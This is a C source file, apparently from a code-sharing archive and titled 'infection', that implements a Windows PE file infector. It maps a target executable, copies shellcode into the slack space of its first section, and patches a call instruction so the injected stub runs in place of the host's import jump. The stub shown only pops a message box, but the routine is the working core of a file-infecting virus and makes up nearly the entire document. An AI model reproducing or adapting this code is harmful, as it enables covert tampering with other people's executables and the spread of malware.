ganran.rar_感染

#include <windows.h> int InjectCode(char szHostFile[]) {// PIMAGE_DOS_HEADER pImageDosHeader ; PIMAGE_NT_HEADERS pImageNtHeaders ; PIMAGE_SECTION_HEADER pImageSectionHeader; unsigned char thunkcode[] = "\x60\x9c\xe8\x00\x00\x00\x00\x5b" "\x81\xeb\x0d\x10\x40\x00\x6a\x00" "\x8d\x83\x30\x10\x40\x00\x50\x50" "\x6a\x00\xb8\x78\x56\x34\x12\xff" "\xd0\x9d\x61\xff\x25\x3a\x10\x40" "\x00\x90\xBD\xF0\xD6\xED\xB0\xDD" "\xC4\xEA\x00"; HANDLE hFile ; HANDLE hMap ; LPVOID pMapping ; DWORD dwGapSize ; unsigned char *pGapEntry ; int i ; PROC MsgBox ; DWORD OldEntry ; int x = 0x18 ; int vir_len ; unsigned char *pSearch ; DWORD *dwCallNextAddr ; DWORD *dwCallDataOffset ; DWORD *dwCallDataAddr ; DWORD dwCallData ; DWORD dwCodeDistance ; DWORD *dwJmpAddr ; DWORD dwJmpData ; DWORD dwJmpVA ; //::: hFile = CreateFile(szHostFile, FILE_SHARE_READ|FILE_SHARE_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL) ; if (hFile==INVALID_HANDLE_VALUE) { return -1 ; } hMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, NULL) ; if (!hMap) return -1 ; pMapping = MapViewOfFile(hMap, FILE_MAP_ALL_ACCESS, 0, 0, 0) ; if (!pMapping) return -1 ; pImageDosHeader = (PIMAGE_DOS_HEADER)pMapping ; if (pImageDosHeader->e_magic==IMAGE_DOS_SIGNATURE) { pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)pMapping+pImageDosHeader->e_lfanew) ; if (pImageNtHeaders->Signature==IMAGE_NT_SIGNATURE) { pImageSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)pMapping+ pImageDosHeader->e_lfanew+ sizeof(IMAGE_NT_HEADERS)) ; dwGapSize = pImageSectionHeader->SizeOfRawData - pImageSectionHeader- >Misc.VirtualSize ; if (sizeof(thunkcode)>dwGapSize) goto Close ; pGapEntry = (unsigned char *)(pImageSectionHeader->PointerToRawData+ (DWORD)pMapping+ pImageSectionHeader->Misc.VirtualSize) ; OldEntry = pImageNtHeaders->OptionalHeader.ImageBase+ pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ; MsgBox = (PROC)GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA") ; //修改为当前系统的MessageBoxA地址 for (i=3;i>=0;i--) { thunkcode[i+27] = ((unsigned int)MsgBox>>x)&0xff ; x -= 8 ; } x = 24 ; vir_len = (int)pImageSectionHeader->Misc.VirtualSize ; pSearch = (unsigned char *)(pImageSectionHeader->PointerToRawData+ (DWORD)pMapping) ; //:::搜索call指令(0xe8) for (i=0;i<vir_len;i++) { if (pSearch[i]==0xe8) { dwCallDataAddr = (DWORD *)(&pSearch[i]+1) ; dwCallNextAddr=(DWORD *)(&pSearch[i]+5) ; dwJmpAddr = (DWORD *)(*dwCallDataAddr+ (DWORD)dwCallNextAddr) ; dwJmpVA = (DWORD)dwJmpAddr- ((DWORD)pMapping+pImageSectionHeader->PointerToRawData)+ pImageNtHeaders->OptionalHeader.ImageBase+ pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ; dwJmpData = *((DWORD *)((unsigned char *)dwJmpAddr+2)) ; if ((*dwJmpAddr&0xffff)==0x25ff) { dwCodeDistance = (DWORD)pGapEntry - (DWORD)dwCallNextAddr ; *dwCallDataAddr = dwCodeDistance ; for (i=3;i>=0;i--) { thunkcode[i+37] = ((unsigned int)dwJmpData>>x)&0xff ; x -= 8 ; } for (i=0;i<sizeof(thunkcode);i++) { pGapEntry[i] = thunkcode[i] ; } break ; } } } } } Close: UnmapViewOfFile(pMapping) ; CloseHandle(hMap) ; CloseHandle(hFile) ; return 0 ; }